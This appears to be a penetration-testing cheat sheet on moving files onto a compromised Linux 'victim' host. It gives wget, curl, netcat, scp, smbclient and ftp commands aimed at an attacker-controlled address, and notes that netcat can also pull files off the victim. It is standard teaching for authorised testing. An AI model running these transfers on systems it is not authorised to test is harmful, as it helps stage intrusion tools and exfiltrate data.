Transferring Files To Linux

All the ways to download your files when on a Linux machine.

Overview

During an engagement, you may find certain tools do not exist, outbound ports have been blocked, and sometimes the machine is just too buggy to transfer your files the only way you know how. For this reason, I find it helpful to have an array of tools at my disposal. I would recommend practicing all the below examples until you know every way you can transfer a file in your specific scenario.

Wget

wget 192.168.1.1:80/example.txt

A Linux command-line tool that you can find on most machines you will encounter. Use in conjunction with an HTTP file server in the previous section.

You can also navigate to the shared files over HTTP by going to http://192.168.1.1:80.

Curl

curl -O http://192.168.1.1:80/example.txt

If not told otherwise, curl writes the received data to stdout. It can be instructed to instead save that data into a local file, using the -o, --output or -O, --remote-name options. Use in conjunction with an HTTP file server in the previous section.

You can also navigate to the shared files over HTTP by going to http://192.168.1.1:80.

Netcat

nc -lvp 5555 > example.txt    //Attacker Machine
nc 192.168.1.1 5555 < example.txt    //Victim Machine

This is one of the rare instances where I include how to host the file as well, since Netcat is such a diverse tool and not just for file transfers. The way I remember the direction of arrows is first we need to send > the file and then receive < it. This tool is especially excellent in that you can reverse the order and download a file from the victim instead. You do not need to have this file hosted on an HTTP web server, as the hosting is done with netcat.

SSH

scp example.txt username@192.168.1.1:/tmp

This is more niche as it obviously relies on having SSH credentials. If you are using something like an id_rsa file instead, reflect those changes but keep the scp and :/tmp. The : is not an error here, I have forgotten it too many times. /tmp is whatever directory on the victim you want to transfer the file to.

SMB

smbclient //192.168.1.1/share -U username
smb: \> get example.txt
smb: \> exit

Even if no password is set for the SMB share, you will still have to press enter upon the password prompt. /share references the share name and is not a default share name, but I usually name my SMB shares “share” for this reason. smb \> represents once you have connected to the share and is not a part of the command that you need to run. Refer to the previous section on starting an SMB share.

FTP

ftp 192.168.1.1

After you are entered the connect command, it will prompt you for both the username and password you want to enter. Even if you are connecting anonymously, you will still have to enter the anonymous:anonymous credentials. From there, you can navigate the file share like a normal directory. Always use the help command if you are unsure of how to download or upload files.

ftp://192.168.1.1

You can also access FTP on any browser by appending ftp:// before the address. You will still be prompted for credentials.

PreviousServing Your FilesNextTransferring Files To Windows

Last updated